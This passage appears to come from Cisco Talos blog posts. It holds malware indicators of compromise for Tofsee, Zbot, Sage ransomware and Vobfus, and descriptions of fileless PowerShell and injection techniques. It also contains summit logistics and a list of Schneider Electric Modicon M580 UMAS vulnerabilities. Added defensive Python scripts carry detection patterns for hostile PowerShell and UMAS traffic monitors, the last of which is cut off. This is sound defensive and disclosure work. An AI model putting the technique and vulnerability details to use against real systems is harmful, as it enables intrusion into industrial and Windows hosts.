  • 7f3e2f8ba14f4f08655e53d1e4daf2fd581e58a444c8c66c57292e28fdde1afc
  • 876ba61de5a3feb2e34181bc9a6e1197e70215b51cc169126c2d0bf0bb7588d4
  • 8eca101db0d90f835dce7436a4e36f786694950a27eef3bfcbc458a347118f3f
  • 9d3547fe7517b3a9cd60eb408e9233273433bcd1bf86093ee7040f8162e54b9a
  • a280c5a73c7388441c7b06d600fd0237cce304d02b93a80a88dff73e1e1fbcc8
  • abd1175388917b260096ca11cc3a8c3e56425abd0dc04650f528ad1669214923
  • b67255713feb497e145187f505da1cb42becbc0684f2b23efb1bbeff2f2f7431
  • b95ea3839a21dfeac94eb4f21efd35d2f1652a7e4c7f65b08bdc846685a7de44
  • c5f806ef8bdaec76e4b022eac1386fd7954522542e7ce21afbc7f7e848d35e12
  • cc5535a4f201268e7a60692d4b21f2da0478771f6fd3379b43f36dbd13d0a2d3
  • d47300165d3868f3b9ad434e8256a950ba2d83a5b71a684000fda9bdbd673585
  • e3fa269a38eea19a1d0e8fbdf9432347109a365378afe16a77fe5956e825ae53
  • effec65407157ad26d5bea08a1def289630078e9c88e4fc70b1e11f83836476d
  • f601204c1446b69b8a5606eb6bfe4e8bded5287513a1beab99160d0495e79f4f
  • f67262db3cd9ff311c83c274b4498a60147316ba82b8e91b16bd2292082c3ff5
  • fa6030698b41b7d260a55312fd83746df4c79d3f86e4c565ae170414d79b1642
  • See JSON for more IOCs

Coverage


Screenshots of Detection

AMP



ThreatGrid



Win.Malware.Tofsee-6988429-1


Indicators of Compromise


Registry KeysOccurrences
Mutexes (occurrences)
N/A
IP Addresses contacted by malware. Does not indicate maliciousness (occurrences)
See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness (occurrences)
See JSON for more IOCs
Files and/or directories created (occurrences)
File Hashes

Coverage

Screenshots of Detection: AMP, ThreatGrid, Umbrella

Win.Packed.Zbot-6986485-1


Indicators of Compromise


Registry Keys (occurrences)
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS, Value Name: LoadAppInit_DLLs (25)
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS, Value Name: AppInit_DLLs (25)
Mutexes (occurrences)
N/A
IP Addresses contacted by malware. Does not indicate maliciousness (occurrences)
N/A
Domain Names contacted by malware. Does not indicate maliciousness (occurrences)
N/A
Files and/or directories created (occurrences)
%ProgramData%\Mozilla\thfirxd.exe (25)
%System32%\Tasks\aybbmte (25)
%ProgramData%\Mozilla\lygbwac.dll (25)
%HOMEPATH%\APPLIC~1\Mozilla\kvlcuie.dll (22)
%HOMEPATH%\APPLIC~1\Mozilla\tfbkpde.exe (22)
%SystemRoot%\Tasks\kylaxsk.job (22)
File Hashes
  • See JSON for more IOCs

Coverage

Screenshots of Detection: AMP, ThreatGrid

Win.Ransomware.Sage-6987538-1


Indicators of Compromise


Registry Keys (occurrences)
<HKLM>\System\CurrentControlSet\Control\Session Manager (25)
<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER, Value Name: PendingFileRenameOperations (25)
<HKCU>\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\##PC#Users (25)
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MOUNTPOINTS2\##PC#USERS, Value Name: _CommentFromDesktopINI (25)
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MOUNTPOINTS2\##PC#USERS, Value Name: _LabelFromDesktopINI (25)
Mutexes (occurrences)
wj6qbq4X (25)
\BaseNamedObjects\PFShggN3 (3)
\BaseNamedObjects\adX9ZN6Z (3)
IP Addresses contacted by malware. Does not indicate maliciousness (occurrences)
See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness (occurrences)
mbfce24rgn65bx3g[.]2kzm0f[.]com (25)
mbfce24rgn65bx3g[.]l3nq0[.]net (25)
Files and/or directories created (occurrences)
%TEMP%\__config252888.bat (25)
%APPDATA%\1SKJ4BcT.tmp (25)
%APPDATA%\h7Ph24Fx.exe (25)
%System32%\Tasks\NuqH5Wz3 (25)
%HOMEPATH%\Documents\!HELP_SOS.hta (20)
%HOMEPATH%\Documents\Outlook Files\!HELP_SOS.hta (20)
%TEMP%\__config16184093.bat (3)
%APPDATA%\qh78RMdu.exe (3)
%APPDATA%\vpiuxHWP.tmp (3)
%HOMEPATH%\Start Menu\Programs\Startup\TLkOeWe7.lnk (3)
File Hashes

Coverage

Screenshots of Detection: AMP, ThreatGrid, Umbrella, Malware

Win.Worm.Vobfus-6986418-0


Indicators of Compromise


Registry Keys (occurrences)
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WindowsUpdate (24)
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED, Value Name: ShowSuperHidden (24)
<HKLM>\SOFTWARE\WOW6432NODE\Policies (24)
<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\WindowsUpdate\AU (24)
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\AU (24)
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\AU, Value Name: NoAutoUpdate (24)
Mutexes (occurrences)
A (24)
IP Addresses contacted by malware. Does not indicate maliciousness (occurrences)
N/A
Domain Names contacted by malware. Does not indicate maliciousness (occurrences)
Files and/or directories created (occurrences)
See JSON for more IOCs
File Hashes

Coverage

Screenshots of Detection: AMP, ThreatGrid

Exprev

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.
  • Madshi injection detected (3872)
    Madshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique.
  • Kovter injection detected (2952)
    A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect the use of monitoring software such as Wireshark and sandboxes and report it to its C2. It spreads through malicious advertising and spam campaigns.
  • PowerShell file-less infection detected (1443)
    A PowerShell command was stored in an environment variable and run. The environment variable is commonly set by a previously run script and is used as a means of evasion. This behavior is a known tactic of the Kovter and Poweliks malware families.
  • Process hollowing detected (356)
    Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
  • Dealply adware detected (243)
    DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
  • Gamarue malware detected (194)
    Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
  • Excessively long PowerShell command detected (106)
    A PowerShell command with a very long command-line argument, which may indicate an obfuscated script, has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats.
  • Installcore adware detected (61)
    InstallCore is an installer that bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that displays advertising in the form of pop-ups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
  • Fusion adware detected (40)
    Fusion (or FusionPlayer) is an adware family that displays unwanted advertising in the form of popups or by injecting into browsers and altering advertisements on webpages. Adware is known to sometimes download and install malware.
  • Possible fileless malware download (31)
    A site commonly used by fileless malware to download additional data has been detected. Several different families of malware have been observed using these sites to download additional stages to inject into other processes.
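As an added example that is not AMP's exploit-prevention logic, the script below applies the PowerShell heuristics described in the list above (a script body pulled from an environment variable, the Kovter/Poweliks pattern, and an excessively long command line that suggests obfuscation) to process-creation events, and adds the related base64 -EncodedCommand check with a decoder for the analyst. The event field names, the length threshold and the sample events are constructed or assumed.

```python
"""
Triage Windows process-creation events for the PowerShell patterns the list
above describes: a command line long enough to suggest an obfuscated script,
a script body pulled from an environment variable (the Kovter/Poweliks
fileless pattern), and, as a related check, base64-encoded commands.

Added example; this is not AMP's exploit-prevention logic. The events,
the field names and the length threshold are constructed or assumed.
"""
import base64
import re
from typing import Dict, List, Optional, Tuple

# Assumed threshold; a production rule would be tuned per environment.
LONG_CMDLINE_THRESHOLD = 1000

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Script body handed to Invoke-Expression from an environment variable,
# either as an argument ("iex $env:NAME") or through the pipeline
# ("$env:NAME | iex").
ENV_TO_IEX = re.compile(
    r"(?:iex|invoke-expression)\s*\(?\s*\$env:\w+"
    r"|\$env:\w+\s*\|\s*(?:iex|invoke-expression)",
    re.IGNORECASE,
)

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_COMMAND = re.compile(
    r"\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE
)


def score_event(event: Dict[str, str]) -> List[str]:
    """Return the reasons this event deserves a look; empty list if none."""
    image = event.get("image", "").rsplit("\\", 1)[-1].lower()
    cmd = event.get("command_line", "")
    if image not in POWERSHELL_IMAGES:
        return []  # these heuristics are specific to PowerShell
    reasons = []
    if len(cmd) > LONG_CMDLINE_THRESHOLD:
        reasons.append(f"excessively long command line ({len(cmd)} chars)")
    if ENV_TO_IEX.search(cmd):
        reasons.append("script body sourced from an environment variable")
    if ENCODED_COMMAND.search(cmd):
        reasons.append("base64-encoded command")
    return reasons


def decode_encoded_command(cmd: str) -> Optional[str]:
    """Recover the plaintext of an -EncodedCommand argument (UTF-16LE under
    base64), or None if there is none or it does not decode."""
    match = ENCODED_COMMAND.search(cmd)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Return (event index, reasons) for every event that scored."""
    hits = []
    for idx, event in enumerate(events):
        reasons = score_event(event)
        if reasons:
            hits.append((idx, reasons))
    return hits


# Constructed sample events in a Sysmon-like shape (not real telemetry).
_ENCODED = base64.b64encode("Write-Host hello".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {   # 0: ordinary scheduled script, should not score
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": r"powershell.exe -NoProfile -File C:\scripts\inventory.ps1",
    },
    {   # 1: body read from an environment variable set by an earlier stage
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": 'powershell.exe -NoProfile -c "iex $env:CONFIGDATA"',
    },
    {   # 2: padding stands in for a long obfuscated script
        "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe -c \"$s='" + "A" * 1500 + "'\"",
    },
    {   # 3: encoded command
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": f"powershell.exe -EncodedCommand {_ENCODED}",
    },
    {   # 4: long but not PowerShell, so out of scope for these rules
        "image": r"C:\Windows\System32\cmd.exe",
        "command_line": "cmd.exe /c echo " + "B" * 1500,
    },
]

if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_EVENTS):
        print(idx, "; ".join(reasons))
        decoded = decode_encoded_command(SAMPLE_EVENTS[idx]["command_line"])
        if decoded:
            print("   decoded:", decoded)
```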

Know before you go: Talos Threat Research Summit

We are now just 48 hours away from the second annual Talos Threat Research Summit. After last year's success in Orlando, we are back and better than ever from San Diego on Sunday.

If you plan on attending, here's what you need to know before Sunday morning. Can't make it out? You can still stream our keynote address from Elizabeth Wharton at 8:10 a.m. PT by following us on Twitter.

Event Location

Marriott Marquis San Diego Marina
333 W Harbor Drive, San Diego, Calif. 92101
North Tower, Level 1, Pacific Ballrooms 14-20

Summit Check-in & Badge Pick-up

Your Talos Threat Research Summit registration will be designated on your Cisco Live badge. Your badge can be picked up at the San Diego Convention Center, Hilton Bayfront, Grand Hyatt, and Marriott Marquis at designated locations beginning at 3 p.m. Saturday. Visit our Know Before You Go page to see a full list of locations and times that badge pick up is available. Please pick up your badge on Saturday to ensure a speedy entry into the event on Sunday morning.

The event space opens on Sunday at 7:00 a.m. to serve breakfast and coffee. Breakfast will be served from 7 - 8 a.m.

Please note that at 8:30 a.m., overflow seating will be opened to guests on the standby list. If you arrive late, you may find that only overflow seating is available. Overflow seating does not include a table for your computer/tablet/notebook.

Event Speakers & Agenda

View the speaker list and full agenda on the Cisco Talos Threat Research Summit website.

Event Attire

Casual

Event Shuttle

Hotel Shuttles will be available from designated hotels to the San Diego Convention Center, which is directly next door to the Marriott Marquis San Diego Marina. Signage at the Marriott Marquis will guide you to the North Tower, Level 1, Pacific Ballrooms 14-20.

Cisco Webex Teams

To enhance your Cisco Talos Threat Research Summit program experience, we invite you to join a dedicated Webex Team space to engage with us during the event. Within the Team space, we’ll share announcements, post slide decks, and more. You’ll also be able to ask questions and get answers in live time and connect with your fellow Summit attendees. If you are new to Webex Teams, you will need to download the Webex Team app first before joining the dedicated Talos Summit Team space.

Social Media

Connect with Talos. Use #CLUS and #TTRS19 to connect with other attendees.

If your plans have changed and you no longer are able to attend the Cisco Talos Threat Research Summit, please notify us immediately at ttrs@cisco.com to cancel your registration.

Should you have any questions prior to your arrival please contact the Cisco Talos Threat Research Summit support team at ttrs@cisco.com.

We look forward to seeing you at the Threat Research Summit and at the Talos booth at Cisco Live later in the week.

The sights and sounds from the Talos Threat Research Summit

More than 250 threat hunters, network defenders and analysts gathered ahead of Cisco Live for the second annual Talos Threat Research Summit on Sunday.

The conference by defenders, for defenders, returned this year in San Diego after its inaugural event in 2018, with speakers passing on their knowledge of writing detection, stopping phishing attacks, responding to ransomware, and more.

Liz Wharton, the vice president of operations and strategy at security firm Prevailion, kicked off the day with her keynote address, where she passed on her first-hand knowledge from handling a recent ransomware attack in Atlanta that took the city government offline for weeks.

Wharton discussed how governments and organizations can prepare ahead of time for these attacks, and what the appropriate responses are to these attackers.

You can view a recorded, livestreamed version of her keynote below (apologies for the low-quality audio).

Other speakers included James Cox, a network server team manager for Howard County, Maryland. Cox was at the forefront of the response to a recent denial-of-service attack on the county's 911 system. You can read a full breakdown of Cox's talk, and the attack, over at the Cisco Newsroom.

We ended the day with a Q&A session with Talos leadership. Attendees asked about the appropriate responses to ransomware attacks, how we develop protections, and more. You can view the entire Q&A below.


Thanks to everyone who came out to this year's Threat Research Summit. We look forward to being back (and bigger) in 2020.

Vulnerability Spotlight: Multiple vulnerabilities in Schneider Electric Modicon M580

Jared Rittle of Cisco Talos discovered these vulnerabilities.

Executive summary

There are several vulnerabilities in the Schneider Electric Modicon M580 that could lead to a variety of conditions, including denial of service and the disclosure of sensitive information. The Modicon M580 is the latest in Schneider Electric's Modicon line of programmable automation controllers. The majority of the bugs we will discuss exist in UMAS requests made while operating the hardware.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Schneider Electric to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

Schneider Electric Modicon M580 UMAS release reservation denial-of-service vulnerability (TALOS-2018-0735/CVE-2018-7846)

An exploitable denial-of-service vulnerability exists in the UMAS Release PLC Reservation function of the Schneider Electric Modicon M580 Programmable Automation Controller, firmware version SV2.70. A specially crafted UMAS command can cause the device to invalidate a session without verifying the authenticity of the sender, resulting in the disconnection of legitimate devices. An attacker can send unauthenticated commands to trigger this vulnerability.

For more information on this vulnerability, read the complete advisory here.

Schneider Electric Modicon M580 UMAS strategy transfer denial-of-service vulnerability (TALOS-2018-0737/CVE-2018-7849)

An exploitable denial-of-service vulnerability exists in the UMAS strategy transfer functionality of the Schneider Electric Modicon M580 programmable automation controller firmware version SV2.70. A specially crafted UMAS command can cause the device to enter a recoverable fault state, resulting in a stoppage of normal device execution. An attacker can send unauthenticated commands to trigger this vulnerability.

For more information on this vulnerability, read the complete advisory here.

Schneider Electric Modicon M580 UMAS block read strategy denial-of-service vulnerability (TALOS-2018-0738/CVE-2018-7843)

An exploitable denial-of-service vulnerability exists in the UMAS memory block read function of the Schneider Electric Modicon M580 programmable automation controller, firmware version SV2.70. A specially crafted UMAS command can cause the device to enter a non-recoverable fault state, resulting in a complete stoppage of remote communications with the device. An attacker can send unauthenticated commands to trigger this vulnerability.

For more information on this vulnerability, read the complete advisory here.

Schneider Electric Modicon M580 UMAS information disclosure vulnerability (TALOS-2018-0739/CVE-2018-7844)

An exploitable information disclosure vulnerability exists in the UMAS read memory block function of the Schneider Electric Modicon M580 programmable automation controller, firmware version SV2.70. A specially crafted UMAS command can cause the device to return blocks of memory, resulting in the disclosure of plaintext read, write and trap SNMP community strings. An attacker can send unauthenticated commands to trigger this vulnerability.

For more information on this vulnerability, read the complete advisory here.

Schneider Electric Modicon M580 UMAS strategy read information disclosure vulnerability (TALOS-2018-0740/CVE-2018-7848)

An exploitable information disclosure vulnerability exists in the UMAS strategy read functionality of the Schneider Electric Modicon M580 Programmable Automation Controller, firmware version SV2.70. A specially crafted UMAS command can cause the device to return blocks of the programmed strategy, resulting in the disclosure of plaintext read, write, and trap SNMP community strings. An attacker can send unauthenticated commands to trigger this vulnerability.

For more information on this vulnerability, read the complete advisory here.

Schneider Electric Modicon M580 UMAS improper authentication vulnerability (TALOS-2018-0741/CVE-2018-7842)

An exploitable improper authentication vulnerability exists in the UMAS PLC reservation function of the Schneider Electric Modicon M580 Programmable Automation Controller, firmware version SV2.70. A specially crafted UMAS command can allow an attacker to masquerade as an authenticated user, resulting in the ability to bypass password protections in place on the device. An attacker can send unauthenticated commands to trigger this vulnerability.

For more information on this vulnerability, read the complete advisory here.

Schneider Electric Modicon M580 UMAS strategy file write vulnerability (TALOS-2018-0742/CVE-2018-7847)

An exploitable unauthenticated file write vulnerability exists in the UMAS strategy programming function of the Schneider Electric Modicon M580 programmable automation controller, firmware version SV2.70. A specially crafted sequence of UMAS commands can cause the device to overwrite its programmed strategy, resulting in a wide range of effects, including configuration modifications, disruption of the running process and potential code execution. An attacker can send unauthenticated commands to trigger this vulnerability.

For more information on this vulnerability, read the complete advisory here.

Schneider Electric Modicon M580 UnityPro reliance on untrusted inputs vulnerability (TALOS-2018-0743/CVE-2018-7850)

An exploitable reliance on untrusted inputs vulnerability exists in the strategy transfer function of the Schneider Electric UnityProL programming software. When a specially crafted strategy is programmed to a Modicon M580 Programmable Automation Controller and UnityProL is then used to read that strategy, the configuration displayed to the user differs from the one on the device. As a result, UnityProL users cannot verify that the device is acting as intended. An attacker can send unauthenticated commands to trigger this vulnerability.

For more information on this vulnerability, read the complete advisory here.

Schneider Electric Modicon M580 UMAS read memory block out-of-bounds information disclosure vulnerability (TALOS-2018-0745/CVE-2018-7845)

An exploitable information disclosure vulnerability exists in the UMAS memory block read functionality of the Schneider Electric Modicon M580 Programmable Automation Controller. A specially crafted UMAS request can cause an out-of-bounds read, resulting in the disclosure of sensitive information. An attacker can send unauthenticated commands to trigger this vulnerability.

For more information on this vulnerability, read the complete advisory here.

Schneider Electric Modicon M580 UMAS function code 0x6d multiple denial-of-service vulnerabilities (TALOS-2019-0763/CVE-2018-7852)

Multiple denial-of-service vulnerabilities exist in the UMAS protocol functionality of the Schneider Electric Modicon M580 Programmable Automation Controller, firmware version SV2.70. Specially crafted UMAS commands can cause the device to enter a non-recoverable fault state, resulting in a complete stoppage of remote communications with the device. An attacker can send unauthenticated commands to trigger these vulnerabilities.

For more information on these vulnerabilities, read the complete advisory here.

Schneider Electric Modicon M580 UMAS function code 0x28 denial-of-service vulnerability (TALOS-2019-0764/CVE-2018-7853)

An exploitable denial-of-service vulnerability exists in the UMAS function code 0x28 functionality of the Schneider Electric Modicon M580 Programmable Automation Controller, firmware version SV2.70. A specially crafted UMAS command can cause the device to enter a non-recoverable fault state, resulting in a complete stoppage of remote communications with the device. An attacker can send unauthenticated commands to trigger this vulnerability.

For more information on this vulnerability, read the complete advisory here.

Schneider Electric Modicon M580 UMAS function code 0x65 denial-of-service vulnerability (TALOS-2019-0765/CVE-2018-7854)

An exploitable denial-of-service vulnerability exists in the UMAS function code 0x65 functionality of the Schneider Electric Modicon M580 Programmable Automation Controller, firmware version SV2.70. A specially crafted UMAS command can cause the device to enter a non-recoverable fault state, resulting in a complete stoppage of remote communications with the device. An attacker can send unauthenticated commands to trigger this vulnerability.

For more information on this vulnerability, read the complete advisory here.
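A defender-side check for the function-code advisories above, added here as an example that is not Talos or Schneider Electric code: it parses Modbus/TCP frames, extracts the UMAS function code, and alerts when any UMAS request reaches the PLC from a host that is not an approved engineering workstation, since every advisory above is reachable with unauthenticated commands. It assumes the standard MBAP header layout and that UMAS is carried as Modbus function code 0x5A with a one-byte session field before the UMAS function code (public protocol knowledge, not stated on this page); all frames and addresses are constructed.

```python
"""
Monitor Modicon programming traffic: parse a Modbus/TCP frame, pull out the
UMAS function code, and raise an alert when a UMAS request reaches the PLC
from a host that is not an approved engineering workstation.

Added example, not Talos or Schneider Electric code. Assumptions:
  * MBAP header layout: transaction id (2 bytes), protocol id (2),
    length (2), unit id (1), then the Modbus function code (1).
  * UMAS is carried as Modbus function code 0x5A with one session byte
    ahead of the UMAS function code.
All frames and addresses below are constructed.
"""
import struct
from dataclasses import dataclass
from typing import List, Optional, Set, Tuple

MODBUS_FC_UMAS = 0x5A

# UMAS function codes named in the advisories above; annotation only, since
# the same codes are used by legitimate programming tools.
UMAS_ADVISORY_CODES = {
    0x28: "TALOS-2019-0764 / CVE-2018-7853",
    0x65: "TALOS-2019-0765 / CVE-2018-7854",
    0x6D: "TALOS-2019-0763 / CVE-2018-7852",
}


@dataclass
class UmasRequest:
    unit_id: int
    session: int
    function_code: int
    payload: bytes


def parse_umas(frame: bytes) -> Optional[UmasRequest]:
    """Return the UMAS request in a Modbus/TCP frame, or None for anything
    that is not a well-formed UMAS request (plain Modbus, truncated or
    inconsistent frames)."""
    if len(frame) < 10:
        return None
    _tid, proto, length, unit_id, fc = struct.unpack(">HHHBB", frame[:8])
    if proto != 0:                # protocol id is always 0 for Modbus/TCP
        return None
    if length != len(frame) - 6:  # MBAP length covers unit id + PDU
        return None
    if fc != MODBUS_FC_UMAS:
        return None
    return UmasRequest(unit_id, frame[8], frame[9], frame[10:])


def assess(src_ip: str, frame: bytes, approved: Set[str]) -> Optional[str]:
    """Alert text for a UMAS request from an unapproved host, else None."""
    req = parse_umas(frame)
    if req is None or src_ip in approved:
        return None
    note = UMAS_ADVISORY_CODES.get(req.function_code)
    suffix = f" (function code named in {note})" if note else ""
    return (f"UMAS function 0x{req.function_code:02x} to unit {req.unit_id} "
            f"from unapproved host {src_ip}{suffix}")


APPROVED_WORKSTATIONS = {"10.0.0.10"}  # constructed

# (source ip, frame) pairs; all constructed
SAMPLE_TRAFFIC: List[Tuple[str, bytes]] = [
    # UMAS 0x6d from an unknown host
    ("10.0.0.50", b"\x00\x01\x00\x00\x00\x04\x00\x5a\x00\x6d"),
    # plain Modbus read holding registers, not UMAS
    ("10.0.0.50", b"\x00\x02\x00\x00\x00\x06\x01\x03\x00\x00\x00\x0a"),
    # UMAS 0x28 from the approved engineering workstation
    ("10.0.0.10", b"\x00\x03\x00\x00\x00\x04\x00\x5a\x01\x28"),
    # UMAS code not on the advisory list, still from an unknown host
    ("10.0.0.50", b"\x00\x04\x00\x00\x00\x04\x00\x5a\x00\x01"),
    # truncated frame: MBAP length promises 4 bytes, only 2 follow
    ("10.0.0.50", b"\x00\x05\x00\x00\x00\x04\x00\x5a"),
]


def run_samples() -> List[str]:
    """Alerts produced for the constructed traffic, in order."""
    alerts = []
    for src, frame in SAMPLE_TRAFFIC:
        alert = assess(src, frame, APPROVED_WORKSTATIONS)
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for line in run_samples():
        print(line)
```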

Schneider Electric Modicon M580 UMAS set breakpoint denial-of-service vulnerability (TALOS-2019-0766/CVE-2018-7855)

An exploitable denial-of-service vulnerability exists in the UMAS set breakpoint functionality of the Schneider Electric Modicon M580 Programmable Automation Controller, firmware version SV2.70. A specially crafted UMAS command can cause the device to enter a non-recoverable fault state, resulting in a complete stoppage of remote communications with the device. An attacker can send unauthenticated commands to trigger this vulnerability.

For more information on this vulnerability, read the complete advisory here.

Schneider Electric Modicon M580 UMAS memory block write denial-of-service vulnerability (TALOS-2019-0767/CVE-2018-7856)

An exploitable denial-of-service vulnerability exists in the UMAS memory block write functionality of the Schneider Electric Modicon M580 Programmable Automation Controller, firmware version SV2.70. A specially crafted UMAS command can cause the device to enter a non-recoverable fault state, resulting in a complete stoppage of remote communications with the device. An attacker can send unauthenticated commands to trigger this vulnerability.

For more information on this vulnerability, read the complete advisory here.

Schneider Electric Modicon M580 UMAS write system coils and holding registers denial-of-service vulnerability (TALOS-2019-0768/CVE-2018-7857)

An exploitable denial-of-service vulnerability exists in the UMAS write system coils and holding registers functionality of the Schneider Electric Modicon M580 Programmable Automation Controller, firmware version SV2.70. A specially crafted UMAS command can cause the device to enter a non-recoverable fault state, resulting in a complete stoppage of remote communications with the device. An attacker can send unauthenticated commands to trigger this vulnerability.

For more information on this vulnerability, read the complete advisory here.

Schneider Electric Modicon M580 UMAS read system blocks and bits information disclosure vulnerability (TALOS-2019-0769/CVE-2019-6806)

An exploitable information disclosure vulnerability exists in the UMAS Read System Blocks and Bits functionality of the Schneider Electric Modicon M580 Programmable Automation Controller, firmware version SV2.70. A specially crafted UMAS command can cause the device to return blocks of memory, resulting in the disclosure of plaintext read, write, and trap SNMP community strings. An attacker can send unauthenticated commands to trigger this vulnerability.

For more information on this vulnerability, read the complete advisory here.

Schneider Electric Modicon M580 UMAS write system bits and blocks denial-of-service vulnerability (TALOS-2019-0770/CVE-2019-6807)

An exploitable denial-of-service vulnerability exists in the UMAS write system bits and blocks functionality of the Schneider Electric Modicon M580 Programmable Automation Controller, firmware version SV2.70. A specially crafted set of UMAS commands can cause the device to enter a non-recoverable fault state, resulting in a complete stoppage of remote communications with the device. An attacker can send unauthenticated commands to trigger this vulnerability.

For more information on this vulnerability, read the complete advisory here.

Schneider Electric UnityPro PLC simulator remote code execution vulnerability (TALOS-2019-0771/CVE-2019-6808)

An exploitable remote code execution vulnerability exists in the UMAS strategy programming functionality of the Schneider Electric Unity Pro L Programming Software PLC Simulator. A specially crafted sequence of UMAS commands sent to the software's PLC simulator can cause a modified strategy to be programmed, resulting in code execution when the simulator is switched into the start mode. An attacker can send unauthenticated commands to trigger this vulnerability.

For more information on this vulnerability, read the complete advisory here.

Versions tested

Talos tested and confirmed that the Schneider Electric Modicon M580, BMEP582040 SV2.70 is affected by these vulnerabilities.



Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 48521 - 48528
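The commands named in these advisories need no authentication, so a useful compensating control on a plant network is to watch who sends them. The passive monitor below is an added example, not Talos's Snort rules and not Schneider Electric code: it parses Modbus/TCP frames, picks out UMAS requests, and flags the function codes from the advisories (0x28, 0x65, 0x6d) when they arrive from a host that is not on an engineering-workstation allowlist; malformed or truncated frames are reported rather than trusted. The encapsulation it assumes (UMAS carried as Modbus function code 0x5A, with the UMAS function code in the second data byte after a session byte) is not stated on this page, and the sample frames and host addresses are constructed.

```python
import struct

# Assumption, not stated in the advisories: UMAS rides inside Modbus/TCP as
# Modbus function code 0x5A, and the UMAS function code is the second byte
# of that PDU's data (the first byte is a session/reservation byte).
MODBUS_FC_UMAS = 0x5A

# UMAS function codes named in TALOS-2019-0763, -0764 and -0765.
WATCHED_UMAS_CODES = {
    0x6D: "TALOS-2019-0763",
    0x28: "TALOS-2019-0764",
    0x65: "TALOS-2019-0765",
}

# Constructed allowlist: the only workstations expected to program the PLC.
ENGINEERING_HOSTS = {"10.0.0.10"}


def parse_modbus_tcp(frame: bytes):
    """Split one Modbus/TCP frame into MBAP header fields and PDU.

    Returns None when the frame is too short, the protocol id is not 0, or
    the MBAP length field disagrees with the bytes actually present; the
    monitor reports such frames instead of trusting their contents.
    """
    if len(frame) < 8:
        return None
    tid, proto, length, unit = struct.unpack(">HHHB", frame[:7])
    if proto != 0 or length != len(frame) - 6:
        return None
    return {"tid": tid, "unit": unit, "fc": frame[7], "data": frame[8:]}


def inspect_frame(src_ip: str, frame: bytes, engineering_hosts: set):
    """Classify one client-to-PLC frame; return an alert dict or None."""
    pdu = parse_modbus_tcp(frame)
    if pdu is None:
        return {"src": src_ip, "reason": "malformed Modbus/TCP frame"}
    if pdu["fc"] != MODBUS_FC_UMAS:
        return None  # plain Modbus, out of scope for this monitor
    if len(pdu["data"]) < 2:
        return {"src": src_ip, "reason": "truncated UMAS request"}
    umas_fc = pdu["data"][1]
    if umas_fc in WATCHED_UMAS_CODES and src_ip not in engineering_hosts:
        return {
            "src": src_ip,
            "umas_fc": umas_fc,
            "advisory": WATCHED_UMAS_CODES[umas_fc],
            "reason": "watched UMAS function code from non-engineering host",
        }
    return None


def scan(events, engineering_hosts):
    """Run inspect_frame over (src_ip, frame) pairs and collect the alerts."""
    alerts = []
    for src_ip, frame in events:
        alert = inspect_frame(src_ip, frame, engineering_hosts)
        if alert is not None:
            alerts.append(alert)
    return alerts


# Constructed sample frames (MBAP header + PDU); not captured traffic.
SAMPLE_EVENTS = [
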